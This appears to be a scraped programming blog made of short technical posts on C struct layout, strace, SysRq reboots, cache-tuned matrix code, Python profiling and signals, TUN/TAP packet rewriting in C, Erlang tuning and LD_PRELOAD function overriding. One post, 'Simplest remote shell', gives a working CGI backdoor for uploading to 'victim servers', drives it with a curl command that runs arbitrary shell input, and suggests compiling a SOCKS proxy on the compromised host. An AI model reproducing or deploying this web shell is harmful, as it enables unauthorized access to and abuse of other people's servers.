struct ifreq { char ifr_name[IFNAMSIZ]; /* Interface name */ union { struct sockaddr ifr_addr; struct sockaddr ifr_dstaddr; struct sockaddr ifr_broadaddr; struct sockaddr ifr_netmask; struct sockaddr ifr_hwaddr; short ifr_flags; int ifr_ifindex; int ifr_metric; int ifr_mtu; struct ifmap ifr_map; char ifr_slave[IFNAMSIZ]; char ifr_newname[IFNAMSIZ]; char * ifr_data; }; }; struct sockaddr_in { short sin_family; unsigned short sin_port; struct in_addr sin_addr; char sin_zero[8]; }; struct in_addr { unsigned long s_addr; };Note, there are no holes in these structs. One can expect 4 byte hole before sin_addr on 64 bit systems, but there is no. Those structures are declared in a way that omits holes. A simple test to show
#include <stdio.h> #include <stddef.h> #include <netinet/in.h> struct in_addr2 { unsigned long s_addr; }; struct sockaddr_in2 { short sin_family; unsigned short sin_port; struct in_addr2 sin_addr; char sin_zero[8]; }; int main(void) { printf("%d\n", offsetof(struct sockaddr_in, sin_addr)); printf("%d\n", offsetof(struct sockaddr_in2, sin_addr)); return 0; } gcc 1.c ./a.out 4 8With the help of strace you can find out a lot about utilities, one more example
strace ps ... open("/proc", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 5 fcntl(5, F_GETFD) = 0x1 (flags FD_CLOEXEC) getdents64(5, /* 211 entries */, 32768) = 5552 stat("/proc/1", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0 open("/proc/1/stat", O_RDONLY) = 6 read(6, "1 (init) S 0 1 1 0 -1 4202752 31"..., 1023) = 187 close(6) = 0 open("/proc/1/status", O_RDONLY) = 6 read(6, "Name:\tinit\nState:\tS (sleeping)\nT"..., 1023) = 675 close(6) stat("/proc/2", {st_mode=S_IFDIR|0555, st_size=0, ...}) = 0 ...So, the advice is to not parse output from utilities, it is not reliable thing to do, it is a subject to change. Use ioctl, sysctl, /proc, etc. to gather info you need. Use strace and others to find out what you need.
P.S. The funniest bug I've seen is when one mixed stdout and stderr and got every time new result upon parsing due to two streams are mixed in an unpredictable way. The other one was due to i18n feature.
Linux, reboot --force
If you cannot reboot your system (e.g. cannot umount some device due to its malfunction or network loss during work with remote hard drive) use Magic SysRq key
The magic SysRq key is a key combination understood by the Linux kernel, which allows the user to perform various low level commands regardless of the system's state.Kernel must have been compiled with CONFIG_MAGIC_SYSRQ
cat /boot/config-`uname -r` | grep CONFIG_MAGIC_SYSRQ CONFIG_MAGIC_SYSRQ=yTo actually reboot
echo 1 > /proc/sys/kernel/sysrq echo b > /proc/sysrq-trigger
Best template lib for C
You've seen or heard about Clearsilver, CTPP, libctemplate. But the best template lib which has C spirit is libtemplate
Using templates in PHP and C++ has spoiled me. So when I started developing applications in C, I went hunting for a templating library that I could use again. I didn't find it, so after developing in a mixture of C for my lowlevel routines and C++ for my interface, I finally broke down and wrote a templating engine in C. (See Free HTML Template Engine.)An example
#include "template.h" int main(void) { struct tpl_engine *engine; int n; char n1[10], n2[10], n3[10]; engine = tpl_engine_new(); /* Load the template file */ tpl_file_load(engine, "test.tpl"); for(n = 1; n <= 10; n++) { sprintf(n1, "%d", n); sprintf(n2, "%d", n*n); sprintf(n3, "%d", n*n*n); tpl_element_set(engine, "n", n1); tpl_element_set(engine, "n2", n2); tpl_element_set(engine, "n3", n3); /* Parse the template 'row' and add the result to element 'rows' */ tpl_parse(engine, "row", "rows", 1); } tpl_parse(engine, "grid", "main", 0); printf("%s", tpl_element_get(engine, "main")); return 0; }test.tpl
<template name="grid"> <table> <tr> <th>n</th> <th>nˆ2</th> <th>nˆ3</th> </tr> {rows} </table> </template> <template name="row"> <tr> <td>{n}</td> <td>{n2}</td> <td>{n3}</td> </tr> </template>
Don't optimize when you are not asked to
The code below as you may guess multiplies two matrices (see Ulrich Drepper, What Every Programmer Should Know About Memory)
But the main difference as author says is
for (i = 0; i < N; ++i) for (j = 0; j < N; ++j) for (k = 0; k < N; ++k) res[i][j] += mul1[i][k] * mul2[k][j];The next piece of code does the same (as you probably may not guess anymore)
#define SM (CLS / sizeof (double)) for (i = 0; i < N; i += SM) for (j = 0; j < N; j += SM) for (k = 0; k < N; k += SM) for (i2 = 0, rres = &res[i][j], rmul1 = &mul1[i][k]; i2 < SM; ++i2, rres += N, rmul1 += N) for (k2 = 0, rmul2 = &mul2[k][j]; k2 < SM; ++k2, rmul2 += N) for (j2 = 0; j2 < SM; ++j2) rres[j2] += rmul1[k2] * rmul2[j2];where CLS is a linesize of L1d cache
gcc -DCLS=$(getconf LEVEL1_DCACHE_LINESIZE) ...The speed
Original | Tuned | |
Cycles | 16,765,297,87 | 2,895,041,480 |
Relative | 100% | 17.3% |
But the main difference as author says is
This looks quite scary.
This smacks of premature optimisation and the possibility the user really does not know what they are talking about, not to mention the problem of portability.See Why not cache lines.
Fundamentals, C arrays and pointers
Why C arrays are not pointers? Well, by definition
In C, there is a strong relationship between pointers and arrays, strong enough that pointers and arrays should be discussed simultaneously. (K&R)They are easy to mix up
When an array name is passed to a function, what is passed is the location of the initial element. (K&R)An example
#include <stdio.h> void func(char subarray[100], char* pointer) { printf("sizeof subarray=%zd\n", sizeof(subarray)); printf("address of subarray=%p\n", (void *)subarray); printf("pointer=%p\n", (void *)pointer); } int main() { char array[100]; printf("sizeof of array=%zd\n", sizeof(array)); printf("address of array=%p\n", (void *)array); printf("address of array[0]=%p\n", (void *)&array[0]); func(array, array); } // ---------------------------------------- sizeof of array=100 address of array=0xbfbfe760 address of array[0]=0xbfbfe760 sizeof subarray=4 address of subarray=0xbfbfe760 pointer=0xbfbfe760
Python, profiling
'Have you seen python web developers who do high load site development for living?'
'Oh, almost all of them do such things,' you say.
'Have you seen python devs who know how to debug?'
'A few,' you say.
'Have you seen python devs who profile things that supposed to be high loaded?'
Python has cProfile, C has kcachegrind, they look good together.
For instance, lets profile multithreaded wsgi app. Change your handler
'Oh, almost all of them do such things,' you say.
'Have you seen python devs who know how to debug?'
'A few,' you say.
'Have you seen python devs who profile things that supposed to be high loaded?'
Python has cProfile, C has kcachegrind, they look good together.
For instance, lets profile multithreaded wsgi app. Change your handler
def read(self, request, *args, **kwargs): ... return ...To something like
def read(self, *args, **kwargs): import cProfile import uuid cProfile.runctx('self.read2(*args, **kwargs)', globals(), locals(), '/folder_with_stats/' + uuid.uuid4().get_hex()) return self.__res def read2(self, *args, **kwargs): self.__res = self.read3(*args, **kwargs) def read3(self, request, *args, **kwargs): ... return ...Then (high) load your app. Gather results from folder_with_stats
import os import pstats import time from pyprof2calltree import convert # Collect stats p = None for i in os.listdir('/folder_with_stats'): filename = '/folder_with_stats/' + i if not p: p = pstats.Stats(filename) else: p.add(filename) os.unlink(filename) res = str(int(time.time())) + '.kgrind' convert(p, res) os.execlp('kcachegrind', res)The main thing here to note is pyprof2calltree. The result
If you want httperf with libev on board
Ab eats CPU, so does httperf. Use Weighttp
weighttp -n 1000000 -c 100 -t 10 -k http://localhost/
Reminder, download big files via ssh
When downloading (uploading) big enough file via ssh scp is not the best solution while after termination one needs to resume upload.
Solution
Solution
rsync --inplace -P -e "ssh -i key.pem" IN OUTNote the --inplace parameter.
Signals and threads in python
The task: start a set of processes and wait till they terminate, if SIGTERM is received send same signal to all child processes and again wait till they terminate. (Ok, I'd go with sending signal to the process group, but however.)
The naive solution: use subprocess and threading modules, start thread per child process and communicate(), in main thread join() with others. Why naive? This doesn't work. Signal handler is not invoked. The documentation to signal module says:
Another way is to use coroutines and select:
The naive solution: use subprocess and threading modules, start thread per child process and communicate(), in main thread join() with others. Why naive? This doesn't work. Signal handler is not invoked. The documentation to signal module says:
Although Python signal handlers are called asynchronously as far as the Python user is concerned, they can only occur between the "atomic" instructions of the Python interpreter. This means that signals arriving during long calculations implemented purely in C (such as regular expression matches on large bodies of text) may be delayed for an arbitrary amount of time.That is signal handler will be processed only after current "atomic" operation finishes. Unfortunately join() is one of such atomic operations. In other works signal handler will be invoked only after thread termination.
Another way is to use coroutines and select:
proc = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True, preexec_fn=preexec_fn) fdesc = proc.stdout.fileno() flags = fcntl.fcntl(fdesc, fcntl.F_GETFL) fcntl.fcntl(fdesc, fcntl.F_SETFL, flags | os.O_NONBLOCK) while True: try: dt = proc.stdout.read() if dt == '': break yield dt except IOError: # EWOULDBLOCK yield '' try: select.select([proc.stdout], [], [], 1) except select.error: # select.error: (4, 'Interrupted system call') - ignore it, # just call select again pass while True: try: proc.wait() break except OSError: # OSError: [Errno 4] Interrupted system call continueAnd the supervisor (left - an array of generators from coroutines)
while left: new_left = [] for execute in left: try: execute.next() new_left.append(execute) except StopIteration: pass except Exception, e: err = e left = new_leftAlso note that EINTR in general is not processed by python standard library, it is just forwarded up the stack as C does. In most cases if you are lucky it is enough to call interrupted routine again as in C (but C guarantees that this works, python doesn't).
Python, how to open TUN/TAP device
Just a note in case I forget
def open(n): TUNSETIFF = 0x400454ca IFF_TUN = 0x0001 IFF_TAP = 0x0002 TUNMODE = IFF_TAP MODE = 0 DEBUG = 0 f = os.open("/dev/net/tun", os.O_RDWR) ifs = ioctl(f, TUNSETIFF, struct.pack("16sH", "tap%d" % n, TUNMODE)) #ifname = ifs[:16].strip("\x00") return fAnd then as usual
f1 = open(1) f2 = open(2) p = os.read(f1, 65000) os.write(f2, p) os.close(f1) os.close(f2)
Friday, December 20, 2013
Programming TUN/TAP in Linux, changing IP address on the fly
So you want to map one network to another by implementing your very own bridge that changes network in IP packets it receives and forwards them to other segment. Why not I say, could be.
The plan is
For more information on TUN/TAP try to read Universal TUN/TAP device driver Frequently Asked Question.
In this way if you are in 192.168.14.0/24 network and want to speak with 192.168.14.15 after small manipulations you can speak with that host as if it had address 10.0.0.15.
The instructions and program itself without any further comments are below.
The plan is
- Create 2 tap interfaces: tap1 and tap2.
- Bridge tap1 with eth0 (i.e. everything that reaches tap1 is being forwarded to eth0 by kernel and vice versa).
- Application gets packets from tap2, changes src and dst IP addresses (changes network 10.0.0.0/24 to 192.168.14.0/24) and writes resulting packet to tap1 (then to eth0 and to the wires).
- When application gets response from eth0 (tap1) it substitutes IPs again and writes to tap2.
For more information on TUN/TAP try to read Universal TUN/TAP device driver Frequently Asked Question.
In this way if you are in 192.168.14.0/24 network and want to speak with 192.168.14.15 after small manipulations you can speak with that host as if it had address 10.0.0.15.
The instructions and program itself without any further comments are below.
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <errno.h> #include <sys/ioctl.h> #include <net/if.h> #include <linux/if_tun.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/select.h> #include <stdint.h> #include <arpa/inet.h> #include <linux/ip.h> #include <linux/tcp.h> #include <linux/udp.h> /* Replace ip addresses in packets on L2 level. Setup: tunctl -t tap1 tunctl -t tap2 brctl addif br1 tap1 brctl addif br1 eth0 ifconfig tap1 promisc up ifconfig tap2 promisc up ifconfig tap2 10.0.1.18 netmask 255.255.255.0 Send packets to 10.0.0.0/24 on tap2, they will appear as 192.168.14.0/24 on eth0. Note that these values are harcoded in main. */ static int tun_alloc_old(char *dev) { char tunname[IFNAMSIZ]; sprintf(tunname, "/dev/%s", dev); return open(tunname, O_RDWR); } static int tun_alloc(char *dev) { struct ifreq ifr; int fd; int err; if ((fd = open("/dev/net/tun", O_RDWR)) < 0) return tun_alloc_old(dev); memset(&ifr, 0, sizeof(ifr)); /* Flags: IFF_TUN - TUN device (no Ethernet headers) * IFF_TAP - TAP device * * IFF_NO_PI - Do not provide packet information */ ifr.ifr_flags = IFF_TAP; if (*dev) strncpy(ifr.ifr_name, dev, IFNAMSIZ); if ((err = ioctl(fd, TUNSETIFF, (void*)&ifr)) < 0) { close(fd); perror("TUNSETIFF"); return err; } strcpy(dev, ifr.ifr_name); return fd; } static size_t write2(int fildes, const void *buf, size_t nbyte) { int ret; size_t n; n = nbyte; while (n > 0) { ret = write(fildes, buf, nbyte); if (ret < 0) return ret; n -= ret; buf += ret; } return nbyte; } static uint16_t ipcheck(uint16_t *ptr, size_t len) { uint32_t sum; uint16_t answer; sum = 0; while (len > 1) { sum += *ptr++; len -= 2; } sum = (sum >> 16) + (sum & 0xFFFF); sum += (sum >> 16); answer = ~sum; return answer; } static uint16_t check2(struct iovec *iov, int iovcnt) { long sum; uint16_t answer; struct iovec *iovp; sum = 0; for (iovp = iov; iovp < iov + iovcnt; iovp++) { uint16_t *ptr; size_t len; ptr = iovp->iov_base; len = iovp->iov_len; while (len > 1) { sum += *ptr++; len -= 2; } if (len == 1) { u_char t[2]; t[0] = (u_char)*ptr; t[1] = 0; sum += (uint16_t)*t; } } sum = (sum >> 16) + (sum & 0xFFFF); sum += (sum >> 16); answer = ~sum; return answer; } static void tcpcheck(struct iphdr *iph, struct tcphdr *tcph, size_t len) { struct iovec iov[5]; iov[0].iov_base = &iph->saddr; iov[0].iov_len = 4; iov[1].iov_base = &iph->daddr; iov[1].iov_len = 4; u_char t[2]; t[0] = 0; t[1] = iph->protocol; iov[2].iov_base = t; iov[2].iov_len = 2; uint16_t l; l = htons(tcph->doff * 4 + len); iov[3].iov_base = &l; iov[3].iov_len = 2; iov[4].iov_base = tcph; iov[4].iov_len = tcph->doff * 4 + len; tcph->check = 0; tcph->check = check2(iov, sizeof(iov) / sizeof(struct iovec)); } static void udpcheck(struct iphdr *iph, struct udphdr *udph) { struct iovec iov[5]; iov[0].iov_base = &iph->saddr; iov[0].iov_len = 4; iov[1].iov_base = &iph->daddr; iov[1].iov_len = 4; u_char t[2]; t[0] = 0; t[1] = iph->protocol; iov[2].iov_base = t; iov[2].iov_len = 2; uint16_t l; l = udph->len; iov[3].iov_base = &l; iov[3].iov_len = 2; iov[4].iov_base = udph; iov[4].iov_len = ntohs(udph->len); udph->check = 0; udph->check = check2(iov, sizeof(iov) / sizeof(struct iovec)); } static int substitute(u_char* buf, ssize_t n, u_char* net1, u_char* net2) { if (buf[12] == 8 && buf[13] == 6) { u_char *arp; arp = buf + 14; /* replace ip */ if (!memcmp(arp + 14, net1, 3)) { memcpy(arp + 14, net2, 3); } if (!memcmp(arp + 24, net1, 3)) { memcpy(arp + 24, net2, 3); } } else if (buf[12] == 8 && buf[13] == 0) { struct iphdr *iph; size_t len; iph = (struct iphdr*)(buf + 14); len = iph->ihl * 4; /* clear crc */ iph->check = 0; /* replcace ip */ if (!memcmp(&iph->saddr, net1, 3)) { memcpy(&iph->saddr, net2, 3); } if (!memcmp(&iph->daddr, net1, 3)) { memcpy(&iph->daddr, net2, 3); } /* put new crc */ iph->check = ipcheck((uint16_t*)iph, len); if (iph->protocol == 6) { struct tcphdr *tcph; tcph = (struct tcphdr*)((u_char*)iph + len); tcpcheck(iph, tcph, n - ((u_char*)tcph - buf) - tcph->doff * 4); } else if (iph->protocol == 17) { struct udphdr *udph; udph = (struct udphdr*)((u_char*)iph + len); udpcheck(iph, udph); } } return 0; } int main(int argc, char **argv) { int tap1; int tap2; int maxfd; char tunname[IFNAMSIZ]; u_char buf[15000]; ssize_t n; u_char net1[] = {192, 168, 14}; u_char net2[] = {10, 0, 1}; strcpy(tunname, "tap1"); if ((tap1 = tun_alloc(tunname)) < 0) { goto error; } strcpy(tunname, "tap2"); if ((tap2 = tun_alloc(tunname)) < 0) { goto error; } maxfd = (tap1 > tap2)? tap1 : tap2; while (1) { int ret; fd_set rd_set; FD_ZERO(&rd_set); FD_SET(tap1, &rd_set); FD_SET(tap2, &rd_set); ret = select(maxfd + 1, &rd_set, NULL, NULL, NULL); if (ret < 0 && errno == EINTR) { continue; } if (ret < 0) { perror("select()"); goto error; } if (FD_ISSET(tap1, &rd_set)) { n = read(tap1, buf, sizeof(buf)); if (n < 0) goto error; if (substitute(buf, n, net1, net2)) goto error; if (write2(tap2, buf, n) < 0) goto error; } if (FD_ISSET(tap2, &rd_set)) { n = read(tap2, buf, sizeof(buf)); if (n < 0) goto error; if (substitute(buf, n, net2, net1)) goto error; if (write2(tap1, buf, n) < 0) goto error; } } close(tap1); close(tap2); return 0; error: return 1; }
Simplest remote shell
Any true webmaster at least once has installed some remote shells (backdoors) to victim servers. I've used the simplest backdoor ever existed.
First create file sh.cgi and upload it to the victim server (don't forget to set execute permissions)
First create file sh.cgi and upload it to the victim server (don't forget to set execute permissions)
#!/bin/sh /bin/shThat is all our remote shell implementation. Locally create file lets say with the name 1
echo -e "Content-Type: text/plain\r\n\r" uname -a id exit 0Test it
> curl --data-binary @1 http://host/sh.cgi Linux *** 2.6.26-1-amd64 #1 SMP Fri Mar 13 17:46:45 UTC 2009 x86_64 GNU/Linux uid=33(www-data) gid=33(www-data) groups=33(www-data)If you are lucky you can upload files, compile them and run
echo -e "Content-Type: text/plain\r\n\r" cc socks.c 2>&1 ./a.out 2>&1 exit 0Download socks.c. Imlements SOCKS5, addresses are harcoded.
Erlang, how to change backlog in http inets server
Moving my very old posts from old engine I've found interesting problem on increasing backlog from 128 that is inappropriate for loaded system to something more suitable. Long time ago (in 2010) an only way I found to do this was to apply the following patch
> diff -u /usr/lib64/erlang/lib/inets-5.5/src/http_lib/http_transport.erl http_transport.erl --- /usr/lib64/erlang/lib/inets-5.5/src/http_lib/http_transport.erl 2010-09-28 12:45:42.000000000 +0300 +++ http_transport.erl 2010-12-08 17:57:42.759407719 +0200 @@ -218,7 +218,7 @@ get_socket_info(Addr, Port) -> Key = list_to_atom("httpd_" ++ integer_to_list(Port)), - BaseOpts = [{backlog, 128}, {reuseaddr, true}], + BaseOpts = [{backlog, 10000}, {reuseaddr, true}], IpFamilyDefault = ipfamily_default(Addr, Port), case init:get_argument(Key) of {ok, [[Value]]} ->I wonder whether this is still true.
Override function in shared library
Lets override write() in libc
#define _GNU_SOURCE /* for RTLD_NEXT */ static ssize_t (*libc_write)(int, const void *, size_t); void init(void) __attribute__((constructor)); void init(void) { libc_write = dlsym(RTLD_NEXT, "write"); } ssize_t write(int fd, const void *buf, size_t count) { // do what you want here return libc_write(fd, buf, count); }Then one needs to assemble .so and put it earlier than libc.so, something like
LD_PRELOAD=/path/to/so/with/our/write.so victim_programSee Function Attributes, dlsym(3).
Subscribe to:
Posts (Atom)